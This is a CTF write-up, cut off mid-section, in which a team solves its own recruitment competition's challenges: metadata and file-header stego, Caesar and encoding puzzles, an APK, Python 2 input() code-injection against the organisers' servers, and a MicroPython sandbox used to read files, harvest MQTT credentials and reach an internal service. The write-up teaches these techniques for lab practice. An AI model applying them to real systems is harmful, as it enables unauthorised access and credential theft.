> 2021.01.16 10.00 AM -- 2021.01.17 11.59 PM

# TOC

0. Backstory
1. Warmup
2. Mobile
3. Programming
4. Cryptography
5. Steganography
6. Forensics
7. Misc
8. Web
9. Open-Source Intelligence
10. Exploitation


# 0. A little backstory :D

We finished 3rd in ctftime in the Hungarian leaderboard and after taking a look at other teams we realized we were relatively small in members compared to them.

So we made the decision. We need more teammates but not too many because we still want to learn from ctf's and each other instead of one pro guy speed running every ctf we take part in.

We need to make sure the people we invite to our group are not fully beginners and they have eager to learn and that's the reason why we organized a ctf competition.

> ***The First 3 can join our team 1337B01S***

Since the competition ended by now, here's the **TOP 10**:

```
 1  | fpatrik
 2  | SBlake
 3  | K4pjL
 4  | Fuszi
 5  | Kamee Kaze
 6  | TheF00L
 7  | djohni
 8  | poli & Vinyő
 9  | qmp
10  | wqer & Utaair
```

***Congratulations!!!***

And thanks for playing :D


# 1. Warmup challenges

> *These challenges are the easiest ones*

***Let's DO SOME CHALLENGES BOIIIIISSS***!

## Read the rules - 10 - By ~T4r0

As it says read the rules please and take a closer look at the source because there was a hidden flag there ;)

1. Go to the main page of the ctf [ctf.t4ks3c.xyz/](https://ctf.t4ks3c.xyz/)
2. Hit `ctrl-u` or `F12` to view the source.
3. Search for `flag`. If you used `ctrl-u` just hit `ctrl-f` and type flag. There were 5 on this page. The last was the actual flag **hidden in a comment**.

![flag](img/read_the_rules1.png)

***Takeaway***: Always take a look at the source!

If you've chosen the F12(developer tools) way you must've clicked inspector(firefox) or elements(chromium) and searched the DOM there.

![flag](img/read_the_rules2.png)

The most simple way was to use curl here and grep for the flag.

```
$ curl https://ctf.t4ks3c.xyz/ | grep -o 'flag{.*}'
flag{valami}
flag{4_l1ttl3_w4rmup_f0r_th3_3z_p01nt5}
```

And we got the flag again!

    flag{4_l1ttl3_w4rmup_f0r_th3_3z_p01nt5}

## Stego basics - 50 - By ~T4r0

File: [smoke.png](chall/smoke.png)

- It's something about steganography

Steganography means something was hidden in the image and we have to extract it somehow.

It's always good to check the metadata(**exif data**) of the files because in some cases they might contain sensitive information.

*Just check the docx file your teacher sent* on teams or whatever you are using for online classes. It usually contains the name of the creator etc...

So we need a tool to get this juicy metadata out.
After a google search, we know the name of the tool we need to extract exif information is `exiftool`.

- Install it

And now we can run it on the picture:

```
$ exiftool smoke.png

ExifTool Version Number         : 12.13
File Name                       : smoke.png
Directory                       : .
File Size                       : 42 KiB
File Modification Date/Time     : 2021:01:08 10:30:16+01:00
File Access Date/Time           : 2021:01:11 08:39:46+01:00
File Inode Change Date/Time     : 2021:01:08 10:30:19+01:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 910
Image Height                    : 615
Bit Depth                       : 4
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Palette                         : (Binary data 33 bytes, use -b option to extract)
Comment                         : flag{3x1f_d4t4_c4n_h1d3_1mp0rt4nt_th1ng5}
Image Size                      : 910x615
Megapixels                      : 0.560
```

Did you notice the comment field?

    flag{3x1f_d4t4_c4n_h1d3_1mp0rt4nt_th1ng5}

## Julius - 50 - By ~T4r0

> bhwc{Y345U4N_S0Q1Z_X_LN0QZ}

- It looks like some type of encoding
- Note that the flag format is correct (`4 letters + { + some_text + }`)
- We have to decrypt it!

Since it says Julius you can search for his name and encoding. It will throw out Caesar cipher. Click on the first link: [cryptii.com/pipes/caesar-cipher](https://cryptii.com/pipes/caesar-cipher) and paste the encoded flag.
It gives `iodj{F345B4U_Z0X1G_E_SU0XG}` it's still not the flag.

But no problem because we can increase the shift by clicking on the **+** (the default is 7). After some clicking, we found the correct flag with `30 shifts`!

    flag{C345Y4R_W0U1D_B_PR0UD}

![julius](img/julius.png)

- **NOTE**: I used a little JS to get inverted colors in chromium (You can save it as a bookmark like I did and just click it when your eyes hurt because so some light themed websites in the middle of the night ;)):

```
javascript:(function(){ var h=document.getElementsByTagName('head')[0],s=document.createElement('style');s.setAttribute('type','text/css'); s.appendChild(document.createTextNode('html{-webkit-filter:invert(100%) hue-rotate(180deg) contrast(70%) !important; background: #fff;} .line-content {background-color: #fefefe;}'));h.appendChild(s); })()
```


Another way to solve the challenge is to use `tr` and some logic :D

- Encryption mechanism: **f turns to b**; **l turns to h**; **a turns to w** ...
- Decryption mechanism: **b turns to f**; **h turns to l**; **w turns to a** ...
- English Alphabet: `ABCDEFGHIJKLMNOPQRSTUVWXYZ`
- Differences: bcdef; hijkl, wxyza --> 5 letter difference

I used `tr` in order to rotate the text by 5 letters:

```
$ echo 'bhwc{Y345U4N_S0Q1Z_X_LN0QZ}' | tr 'A-Za-z' 'E-ZA-De-za-d'
flag{C345Y4R_W0U1D_B_PR0UD}
```

    flag{C345Y4R_W0U1D_B_PR0UD}

- I hope you learned something new from this basic *ROT* challenge :D

## JPEG - 50 - By ~T4r0

> The flag is on this jpg.

File: [jpeg_image.jpg](chall/jpeg_image.jpg)

I tried to open it with my image viewer but i got an error:

```
$ sxiv jpeg_image.jpg
sxiv: jpeg_image.jpg: Error opening image
sxiv: no more files to display, aborting
```

Then I ran file on it:

```
$ file jpeg_image.jpg
jpeg_image.jpg: JPEG image data
```

- JPEG image data
- That's **NOT** what a normal JPEG looks like!

`file` on a normal jpeg:

```
$ file avatar.jpg
/home/matesz/dox/pix/avatar.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment
length 16, progressive, precision 8, 254x254, components 3
```

- That's what a normal JPEG looks like! :D

Let's take a look at it's [magic bytes](https://en.wikipedia.org/wiki/List_of_file_signatures):

```
$ xxd jpeg_image.jpg | head -n 3
00000000: ffd8 ffdb 0d0a 1a0a 0000 000d 4948 4452  ............IHDR
00000010: 0000 0258 0000 00c8 0806 0000 0034 9f9f  ...X.........4..
00000020: b600 0001 8369 4343 5049 4343 2070 726f  .....iCCPICC pro
```

If you take a look at the jpeg and png you recognize that the ***beginning of this file is JPEG*** but the ***rest of it is PNG***.

```
JPEG: FF D8 FF DB
PNG: 89 50 4E 47 0D 0A 1A 0A

ffd8 ffdb 0d0a 1a0a
^^^^ ^^^^ ^^^^ ^^^^
 \    /    \    /
  \  /      \  /
 JPEG       PNG
```

We have to change it **to PNG**(`89 50 4E 47 0D 0A 1A 0A`) somehow and that's the time when `hexeditor` is very handy.

Hexeditor basics: Just like nano, open the file and write it. Then save it with `ctrl-x` and hit `<Return>`.
Btw if you need more in-depth knowledge about the tool RTFM:

    man hexeditor

```
$ hexeditor jpeg_image.jpg
89 50 4E 47
<ctrl-x><Return>
```

Now try again with an image viewer:

    flag{1m4g3s_c4n_b3_tr1cky}

## Data Number Structure - 50 - By ~T4r0

> In Minecraft there's an important rule: Never .... straight down!

Hints:

> The name is a hint

> The minecraft thing is just a hint, not the challenge itself. Think about unix programs.

- The answer is ***DIG***.
- This is a cli tool for DNS reconnaissance
- *Data Number Structure -- DNS => We are on the good track*

Let's use `dig`!

There is an option in dig to get the **TXT Records** which is `dig txt <domain>`.

```
$ dig txt t4ks3c.xyz

; <<>> DiG 9.16.8-Debian <<>> txt t4ks3c.xyz
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61413
;; flags: qr rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;t4ks3c.xyz.			IN	TXT

;; ANSWER SECTION:
t4ks3c.xyz.		793	IN	TXT	"cia 123.97.115.99"
t4ks3c.xyz.		793	IN	TXT	"v=spf1 a mx ~all"
t4ks3c.xyz.		793	IN	TXT	"ZmxhZ3sxVFNfNExMVzRZU19ETlN9Cg=="
t4ks3c.xyz.		793	IN	TXT	"fszb 125.255.255.255"
t4ks3c.xyz.		793	IN	TXT	"fbi 49.49.95.114"
t4ks3c.xyz.		793	IN	TXT	"mosad 117.108.51.122"
t4ks3c.xyz.		793	IN	TXT	"nki 102.108.97.103"

;; Query time: 11 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Sun Jan 17 10:03:54 CET 2021
;; MSG SIZE  rcvd: 269
```

- There are some IP addresses and a weird looking base64 encoded string

There is a tool on gnu/linux systems that let you {en,de}code base64 and the name of it is obviously `base64`.

You can take a look at the manpage:

    man base64

So we have to use `-d` switch for decoding.

```
$ echo 'ZmxhZ3sxVFNfNExMVzRZU19ETlN9Cg==' | base64 -d
flag{1TS_4LLW4YS_DNS}
```

## 0uch - 50 - By ~\M4t35Z

> I hid a flag in this meme somewhere. Can you find it?

File: [challenge.gif](chall/challenge.gif)

Just download the file and open it. It's only a meme.

But we MUST find a flag in there somewhere! Let's take a look at the exif data with the previously used tool `exiftool`.

```
$ exiftool challenge.gif
ExifTool Version Number         : 12.13
File Name                       : challenge.gif
Directory                       : .
File Size                       : 3.2 MiB
File Modification Date/Time     : 2021:01:17 10:10:26+01:00
File Access Date/Time           : 2021:01:17 10:10:26+01:00
File Inode Change Date/Time     : 2021:01:17 10:10:49+01:00
File Permissions                : rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 562
Image Height                    : 460
Has Color Map                   : Yes
Color Resolution Depth          : 7
Bits Per Pixel                  : 8
Background Color                : 0
Animation Iterations            : Infinite
Comment                         : 1by1
Frame Count                     : 84
Duration                        : 4.20 s
Image Size                      : 562x460
Megapixels                      : 0.259
```

There is a hint in the **Comment** field:

    Comment : 1by1

> One by One

- This is a hint to open the picture in gimp or another image viewer/editor which can go through the multiple images in a gif one by one.

I used `sxiv` here because it's just awesome :D

sxiv basic controls in a gif: `ctrl-space` - pause/resume gif, `ctrl-n` - next image of gif, `ctrl-p` - previous image of gif

Btw RTFM again: `man sxiv`

    $ sxiv challenge.gif

On the 58th image we can find a weird text going through the cat:

![0uch_text](img/0uch_text.png)

If you take a closer look at this you can read the flag:

    flag{17_hur75_50_b4d}

# 2. Mobile challenge - 100 - By ~WoLfY

> I make mobile apps too! They don't really have a purpose but I gotta start somewhere right?

File: [L33T_4PP.apk](chall/L33T_4PP.apk)

Since this is a mobile challenge and this is an apk it's best to use `apktool` here in order to **unpack** the .apk file to .smali/.xml, etc... files.

    $ apktool d L33T_4PP.apk

We have a directory called `L33T_4PP` after some searching you can find the flag in `L33T_4PP/res/layout/main.xml`. (line 4).

    <TextView android:textSize="12.0sp" android:textColor="#ff11002b" android:id="@id/textview1" android:background="#ff11002b" android:padding="8.0dip" android:layout_width="fill_parent" android:layout_height="30.0dip" android:text="flag{@PK_FL@G_15_H3R3}" />

Btw you could use grep too for faster completion:

```
$ grep -rno 'flag{.*}' ./L33T_4PP
./L33T_4PP/res/layout/main.xml:4:flag{@PK_FL@G_15_H3R3}
```

    flag{@PK_FL@G_15_H3R3}

- `-r` => recursive
- `-n` => show line number
- `-o` => only matching
- `.*` => anything

# 3. Programming challenges

## Whyton - By ~\M4t35Z

- These challenges are basically the same
- They all based on a python2 vulnerability in the `input()` function

There are 2 blogposts about this:
- [posts.xh4h.com/python/2019/08/02/input_poc.html](https://posts.xh4h.com/python/2019/08/02/input_poc.html)
- [posts.xh4h.com/python/2019/08/03/input_magic.html](https://posts.xh4h.com/python/2019/08/03/input_magic.html)

I agree, I copied this challenge but this was so mindblowing when I read that so everybody should know about it! :D

### Whyton 1 - 100

> Guess the number! Or do it the other way! :D

> **nc 192.46.235.191 2220**

File: [hax1.py](chall/hax1.py)

Source code:

```py
import random
flag = "REDACTED"
rand_num = random.randrange(200)

try:
    p = input("Guess the secret number(0-200): ")
    if p == rand_num:
        print("Noice!")
        print("Here is ur flag bro: " + flag) 
    else:
        print("Wrong! TRY H4RD3R! :(")

except Exception as e:
    print("What are u doin? xD")
```

- A simple python script
- Generates a random number 
- If the user guessed it rght it prints out the value of `flag`

Try to get the dummy flag locally:

```
python2 hax1.py
Guess the secret number(0-200): asd
What are u doin? xD

python2 hax1.py
Guess the secret number(0-200): 12
Wrong! TRY H4RD3R! :(

python2 hax1.py
Guess the secret number(0-200): rand_num
Noice!
Here is ur flag bro: REDACTED

python3 hax1.py
Guess the secret number(0-200): rand_num
Wrong! TRY H4RD3R! :(
```

- We got it with python2 but not with python3!

Now it's time to use this on the server.

```
$ nc 192.46.235.191 2220
Guess the secret number(0-200):
rand_num
Noice!
Here is ur flag bro: flag{4yy_4_py2_1337_h3R3}
```

    flag{4yy_4_py2_1337_h3R3}

### whyton 2 - 150

> Guess the loooooong ass password but u also have the other option!

> **nc 192.46.235.191 2221**

File: [hax2.py](chall/hax2.py)

Source:

```py
import string, random

flag = "REDACTED"
password = ''.join(random.choice(string.ascii_lowercase) for i in range(69))

try:
    if input("Password > ") == password:
        print("Awesome!")
        print("But TRY H4RD3R if u want tha fl4G!")
    else:
        print("Wrong!")
        print("The password was: " + password)
except NameError as e:
    print("What are u doing? xD")
```

The same vuln but there is no `print(flag)` so we have to get it somehow.

Try to give it the correct password with this vulnerability:

```
$ python2 hax2.py
Password > password
Awesome!
But TRY H4RD3R if u want tha fl4G!
```

- Yes, but actually no
- There should be a way to print out the flag

And here comes the verbosive error very handy in python :D

- If I can break it somehow I will be able to get the flag

With the vulnerability, we can run python2 code so we can make use of casting in order to get an error that prints out the flag

- We can try casting the string flag to int which will usually return an error.

```
$ python2 hax2.py
Password > int(flag)
Traceback (most recent call last):
  File "hax2.py", line 7, in <module>
    if input("Password > ") == password:
  File "<string>", line 1, in <module>
ValueError: invalid literal for int() with base 10: 'REDACTED'
```

- Got the dummy flag locally

It's time to get it from the server:

```
$ nc 192.46.235.191 2221
Password >
int(flag)
Traceback (most recent call last):
  File "/home/hax2/hax2", line 11, in <module>
    if input() == password:
  File "<string>", line 1, in <module>
ValueError: invalid literal for int() with base 10: 'flag{U_4r3_4_Py7H0n2_31337__BTW_d0n7_u53_17}'
```

    flag{U_4r3_4_Py7H0n2_31337__BTW_d0n7_u53_17}

### Whyton 3 - 200

> Because of the nature of the challenge, the flag contains only numbers! After you get the flag, you need to wrap it with flag{} to be correct, and send it in like that.

> **nc 192.46.235.191 2222**

File: [hax3.py](chall/hax3.py)

Source:

```py
import string, random

flag = "REDACTED"
password = ''.join(random.choice(string.ascii_lowercase) for i in range(69))

try:
    if input("Password > ") == password:
        print("Awesome!")
    else:
        print("Wrong!")
        print("The password was: " + password)
except NameError as e:
    print("What are u doing? xD")
```

- It isn't printing the flag on success
- The flag contains only numbers so int(flag) won't return any error

But after some thinking, you might realize that you can add a string to the number while casting which will surely return an error again.

    int(flag + "asd")

I firstly modified the source's flag line to:

    flag = 1234

```
$ python2 hax3.py
Password > int(flag)
Wrong!
The password was: uuxnncyxaazfseuurgubdtsakjoyuirszajsuekjlrianmdyrvbrbxediqcvbzqleencv
```

- Okay we can't do the thing we did before.

But try the one where we add a string to the flag:

```
$ nc 192.46.235.191 2222
Password >
int(flag+"asd")
Traceback (most recent call last):
  File "/home/hax3/hax3", line 11, in <module>
    if input() == password:
  File "<string>", line 1, in <module>
ValueError: invalid literal for int() with base 10: '133769420694201337asd'
```

    133769420694201337asd
    flag{133769420694201337}

## \<p style="font-size:5px">Snake\</p> - 250 - By ~takov751

> Look at my snake.

![snake_doggo](chall/snake_doggo.png)

> **nc 192.46.235.191 2333**

```
$ nc 192.46.235.191 2333
MicroPython v1.13-268-gf7aafc062-dirty on 2020-12-28; linux version
Use Ctrl-D to exit, Ctrl-E for paste mode
>>>
```

- MicroPython
- This was ***my favourite challenge*** btw :D
- We just have to mess with it

```
help('modules')
__main__          termios           uio               usocket
_thread           uarray            ujson             ussl
btree             ubinascii         umachine          ustruct
builtins          ucollections      uos               usys
cmath             ucryptolib        upip              utime
ffi               uctypes           upip_utarfile     utimeq
gc                uerrno            urandom           uwebsocket
math              uhashlib          ure               uzlib
micropython       uheapq            uselect
Plus any modules on the filesystem
```

- There is an interesting one: `uos`. This is the `os` lib in MicroPython

Now, we have to look up the docs to be able to go further.

- [docs.micropython.org/en/latest/library/uos.html](http://docs.micropython.org/en/latest/library/uos.html)

Let's try the functions!

```
import uos

uos.uname()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'uname'
```

- This means some of the functions are not available!

Try Harder!

```
>>> for i in uos.ilistdir("/"):
for i in uos.ilistdir("/"):
...     print(i)

('run', 16384, 3731629)
('srv', 16384, 2184439)
('mnt', 16384, 2184354)
('.', 16384, 2433783)
('lib', 16384, 3731600)
('home', 16384, 2184133)
('opt', 16384, 2184355)
('..', 16384, 2433480)
('tmp', 16384, 3731632)
('var', 16384, 3843692)
('etc', 16384, 2433527)
('proc', 16384, 2184356)
('sbin', 16384, 3844284)
('sys', 16384, 2184440)
('media', 16384, 2184353)
('dev', 16384, 2433601)
('bin', 16384, 3844208)
('root', 16384, 2184357)
('boot', 16384, 2183958)
('usr', 16384, 3844350)
('lib64', 16384, 2184351)
('test', 16384, 2433866)
('logs', 16384, 2433867)
('.dockerenv', 32768, 2433486)
('start.sh', 32768, 2433860)
('asd.sh', 32768, 2433859)
('data', 16384, 3843750)
('flag9ab17b822020c7cce76295ffb78cb7e15358074e5b7e5fe58db2a22644b27098', 32768, 3729880)
```

- There are some interesting files/dirs in root
- /test
- /.dockerenv
- /start.sh
- /asd.sh
- /data
- /flag9ab17b822020c7cce76295ffb78cb7e15358074e5b7e5fe58db2a22644b27098

Now, we have some files/dirs we just have to read/list them.

Reading the flag:

```
open("flag9ab17b822020c7cce76295ffb78cb7e15358074e5b7e5fe58db2a22644b27098").read()
'flag{my_pyth0n_1s_k1nd4_m1cr0}'
```

    flag{my_pyth0n_1s_k1nd4_m1cr0}

## This sucks - 200

> Subchallange: Snake There is another project I am working on somewhere on the system. You may find something in the haystack.

- This is a subchallenge of the previous one

It's time to list the other interesting directories/read the files.

```
for i in uos.ilistdir("/test"):
...     print(i)

('.', 16384, 262936)
('..', 16384, 262700)
('sub.py', 32768, 256201)
```

- There is a file `sub.py`!

Read it:

```
open("/test/sub.py").read()
'import time\nfrom umqtt.simple import MQTTClient\nimport random\n\n# sub test know i can see all of my topics\n\n# Received messages from subscriptions will be delivered to this callback\ndef sub_cb(topic, msg):\n    print((topic, msg))\n\ndef do_sub(topic="", server="192.46.235.191", user="sensors", password="hunter2",port=25200):\n    c = MQTTClient(str(random.randint(1,1000000)), server,user=user,password=password,port=port)\n    c.set_callback(sub_cb)\n    c.connect()\n
   topic = topic.encode()\n    try:\n        c.subscribe(topic)\n        while True:\n
  if True:\n                # Blocking wait for message\n                c.wait_msg()\n
   else:\n                # Non-blocking wait for message\n                c.check_msg()\n
          # Then need to sleep to avoid 100% CPU usage (in a real\n                # app other useful actions would be performed instead)\n                time.sleep(1)\n    except:\n        print("give at least one topic")\n    \n\n    c.disconnect()'
```

- It's a mess but we can fix it with vim!
- Select the whole text in visual mode then hit:

    **:s/\\\n/<CTRL-v><Return>/g**

this will turn to:

    :'<,'>s/\\n/^M/g

And hit enter!

```py
'import time
from umqtt.simple import MQTTClient
import random

# sub test know i can see all of my topics

# Received messages from subscriptions will be delivered to this callback
def sub_cb(topic, msg):
    print((topic, msg))

def do_sub(topic="", server="192.46.235.191", user="sensors", password="hunter2",port=25200):
    c = MQTTClient(str(random.randint(1,1000000)), server,user=user,password=password,port=port)
    c.set_callback(sub_cb)
    c.connect()

   topic = topic.encode()
    try:
        c.subscribe(topic)
        while True:

  if True:
                # Blocking wait for message
                c.wait_msg()

   else:
                # Non-blocking wait for message
                c.check_msg()

          # Then need to sleep to avoid 100% CPU usage (in a real
                # app other useful actions would be performed instead)
                time.sleep(1)
    except:
        print("give at least one topic")
    

    c.disconnect()'
```

- It's much nicer now :D

Intersting lines:

    from umqtt.simple import MQTTClient
    def do_sub(topic="", server="192.46.235.191", user="sensors", password="hunter2",port=25200):

- MQTT
- 192.46.235.191
- sensors
- hunter2
- 25200

I searched for some mqtt cli client:

- [github.com/hivemq/mqtt-cli](https://github.com/hivemq/mqtt-cli)
- [hivemq.github.io/mqtt-cli/docs/installation/packages.html](https://hivemq.github.io/mqtt-cli/docs/installation/packages.html)
- I downloaded the deb

```
$ wget https://github.com/hivemq/mqtt-cli/releases/download/v4.4.0/mqtt-cli-4.4.0.deb
```

- I read the docs
[hivemq.github.io/mqtt-cli/docs/subscribe.html](https://hivemq.github.io/mqtt-cli/docs/subscribe.html)

And I gave it some parameters(`#` means subscribe to **every** channel):

```
$ mqtt sub -t "#" -h 192.46.235.191 -u sensors -pw hunter2 -p 25200

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=lcd
falg{Y3GRJaUI2C1W4UJ9lupRTVwOXdJqo7ea}
fart{me0GHTbnSYHsuVWhYMM0gQ5kavip8xCM}
falg{6C5uNrFECHwPvDzZVqKEJa0yRklT7lip}
```

- This spams a huge amount of fake flags so I need to filer these out
- I grepped for 'flag'

```
$ mqtt sub -t "#" -h 192.46.235.191 -u sensors -pw hunter2 -p 25200 | grep 'flag'

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=lcd
flag{mqtt_such_fun} DhIPIkqU0YV0
flag{mqtt_such_fun} xAacRkRMtWk1
```

- waited around 1-2 minutes and got the flag

```
flag{mqtt_such_fun}
```

## Hidden service - 200 - By ~takov751

> Subchallange: Snake Did you pay attention to every straw in the haystack? 
> **The required micropython module is installed on the system, even if it does not show up. :wink:**

There is an interesting thing in mqtt. Sometimes it prints out `200`.

```
$ mqtt sub -t "#" -h 192.46.235.191 -u sensors -pw hunter2 -p 25200 | grep -v 'f.*{.*}'
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=lcd
200
200
200
200
```

- This could be related to a web server because 200 is an OK response code.

We can try to enumerate the directory structure of the MicroPython challenge but we don't have the right permissions to do it so we need to do something else. (I tried to do it xD)

Do you remember what does that weird unicode crypto challenge said?

> *Don't rely on the chef, cuz' he's dumb!*

- **DO NOT RELY ON ONLY ONE TOOL!**

We can try another MQTT client:

- [github.com/emqx/MQTTX/releases](https://github.com/emqx/MQTTX/releases)

Just download the .AppImage file and make it executable (`chmod +x MQTT*.AppImage`).

Now you can start it! If there is an error about sandboxing you may add `--no-sandbox` for a temporary bypass for this error.

```
/opt/MQTTX-1.4.2.AppImage --no-sandbox
```

Here, we should add a new connection:

![img/mqttx_new.png](img/mqttx_new.png)

![mqtt_setup](img/mqtt_setup.png)

- Host: mqtt://`192.46.235.191`
- Post: `25200`
- Username: `sensors`
- Password: `hunter2`

After we set everything up we can hit `Connect` (int the top right corner).

Now, we must subscribe to a topic or topics in order to get the messages.
We need to hit `+ New Subscription`:

![mqtt_sub.png](img/mqtt_sub.png)

A new window popped up where we have to change the Topic to `#`!

According to the [mqtt manual](https://mosquitto.org/man/mqtt-7.html) this is a wildcard to get the messages from every topic on the host.
After we set it up we can hit `Confirm` in the bottom right corner.

![mqtt_sub_setup.png](img/mqtt_sub_setup.png)

Now, we start getting the spam again but after some time we will get the 200 one again but now we know the topic of the messages because of the different tool!

![mqtt_200.png](img/mqtt_200.png)

We can search in this application by hitting the three dots on the top right then `Search`. After that there are two fields (topic, message).
Since we know the message (`200`) we can search for it!

![mqtt_search.png](img/mqtt_search.png)

```
Topic: /web/status/server.mqtt QoS: 0
200
```

- The topic is `/web/status/server.mqtt`

After some time I realized that the cli tool can do the same with verbose mode.... I'm a bit reeeee xD

We just need to pass `-v` to enable verbose mode like in every other open-source project.

```
$ mqtt sub -t "#" -h 192.46.235.191 -u sensors -pw hunter2 -p 25200 -v | grep -v 'f...{.*}'
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=lcd
Client 'UNKNOWN@192.46.235.191' sending CONNECT MqttConnect{keepAlive=60, cleanStart=true, sessionExpiryInterval=0, simpleAuth=MqttSimpleAuth{username and password}}
Client 'UNKNOWN@192.46.235.191' received CONNACK MqttConnAck{reasonCode=SUCCESS, sessionPresent=false, assignedClientIdentifier=auto-F716C788-25E0-8FF5-8FB6-53DA773B58D1, restrictions=MqttConnAckRestrictions{receiveMaximum=65535, maximumPacketSize=268435460, topicAliasMaximum=10, maximumQos=EXACTLY_ONCE, retainAvailable=true, wildcardSubscriptionAvailable=true, sharedSubscriptionAvailable=true, subscriptionIdentifiersAvailable=true}}
Client 'auto-F716C788-25E0-8FF5-8FB6-53DA773B58D1@192.46.235.191' sending SUBSCRIBE MqttSubscribe{subscriptions=[MqttSubscription{topicFilter=#, qos=EXACTLY_ONCE, noLocal=false, retainHandling=SEND, retainAsPublished=false}]}
Client 'auto-F716C788-25E0-8FF5-8FB6-53DA773B58D1@192.46.235.191' received SUBACK MqttSubAck{reasonCodes=[GRANTED_QOS_2], packetIdentifier=65526}
200
Client 'auto-F716C788-25E0-8FF5-8FB6-53DA773B58D1@192.46.235.191' received PUBLISH ('200') MqttPublish{topic=/web/status/server.mqtt, payload=3byte, qos=AT_MOST_ONCE, retain=false}
```

- Message: `200`
- Topic: `/web/status/server.mqtt`

The next part was a little guessy in my opinion but the point is that **you need to make a request to this internal domain** `server.mqtt` with MicroPython.

As the hint suggests (*The required micropython module is installed on the system, even if it does not show up.*) there could be a requests module installed!

- [makeblock-micropython-api.readthedocs.io/en/latest/public_library/Third-party-libraries/urequests.html](https://makeblock-micropython-api.readthedocs.io/en/latest/public_library/Third-party-libraries/urequests.html)

Works like the normal requests module:

From the docs:

```
import urequests
res = urequests.get(url='http://server.mqtt/')
print(res.text)
```

Trying out on the server:

```
$ nc 192.46.235.191 2333
MicroPython v1.13-268-gf7aafc062-dirty on 2020-12-28; linux version
Use Ctrl-D to exit, Ctrl-E for paste mode
>>> import urequests
import urequests
>>> res = urequests.get(url='http://server.mqtt/')
res = urequests.get(url='http://server.mqtt/')
>>> print(res.text)
print(res.text)
flag{h1dd3n_fl4g_t3ll_n0_0n3}
>>>
```

```
flag{h1dd3n_fl4g_t3ll_n0_0n3}
```

***Takeovers:***

- **DO NOT RELY ON ONLY ONE TOOL**
- Always think out of the box (`http://server.mqtt`, `urequests`)
- Keep Calm and Try Harder! ;)

# 4. Cryptography challenges

## Thats a lotta encoding - 100 - By ~\M4t35Z

> U have to reverse this encoded string

Hints:

- It's only 5 ;)
- Best to use burp here :D
- Here's a screenshot I hope it helps a littlebit :D
    ![](chall/pic-selected-200212-1947-44.png)

File: [thatsalottaencoding.txt](chall/thatsalottaencoding.txt)

Source:

```
&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x54;&#x45;&#x77;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x44;&#x42;&#x6a;&#x4d;&#x54;&#x41;&#x78;&#x4d;&#x44;&#x41;&#x78;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x54;&#x41;&#x78;&#x4d;&#x54;&#x45;&#x77;&#x4d;&#x44;&#x45;&#x78;&#x59;&#x6a;&#x45;&#x78;&#x4d;&#x44;&#x45;&#x78;&#x4d;&#x44;&#x45;&#x77;&#x4d;&#x44;&#x45;&#x78;&#x4d;&#x54;&#x45;&#x77;&#x4d;&#x44;&#x41;&#x78;&#x4d;&#x57;&#x59;&#x78;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x44;&#x45;&#x77;&#x4d;&#x54;&#x45;&#x77;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x44;&#x46;&#x6d;&#x4d;&#x54;&#x45;&#x77;&#x5a;&#x44;&#x45;&#x77;&#x4d;&#x54;&#x41;&#x78;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x44;&#x41;&#x78;&#x4d;&#x54;&#x45;&#x77;&#x4d;&#x54;&#x45;&#x77;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x41;&#x78;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x41;&#x78;&#x4d;&#x44;&#x45;&#x77;&#x4d;&#x44;&#x45;&#x78;&#x4d;&#x57;&#x59;&#x78;&#x4d;&#x44;&#x41;&#x77;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x45;&#x77;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x57;&#x59;&#x78;&#x4d;&#x44;&#x41;&#x77;&#x4d;&#x44;&#x41;&#x78;&#x4d;&#x44;&#x41;&#x77;&#x5a;&#x54;&#x45;&#x77;&#x4d;&#x44;&#x45;&#x78;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x54;&#x45;&#x77;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x41;&#x78;&#x4d;&#x44;&#x45;&#x78;&#x4d;&#x44;&#x45;&#x77;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x54;&#x45;&#x78;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x44;&#x45;&#x78;&#x4d;&#x44;&#x45;&#x78;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x54;&#x45;&#x77;&#x4d;&#x44;&#x41;&#x77;&#x4d;&#x44;&#x45;&#x77;&#x4d;&#x44;&#x42;&#x6c;&#x4d;&#x54;&#x41;&#x77;&#x4d;&#x44;&#x45;&#x77;&#x4d;&#x44;&#x41;&#x77;&#x4d;&#x57;&#x51;&#x3d;
```

- Looks like html entities

Let's use burp decoder to decode it!

Decoding:

- HTML:
    ```
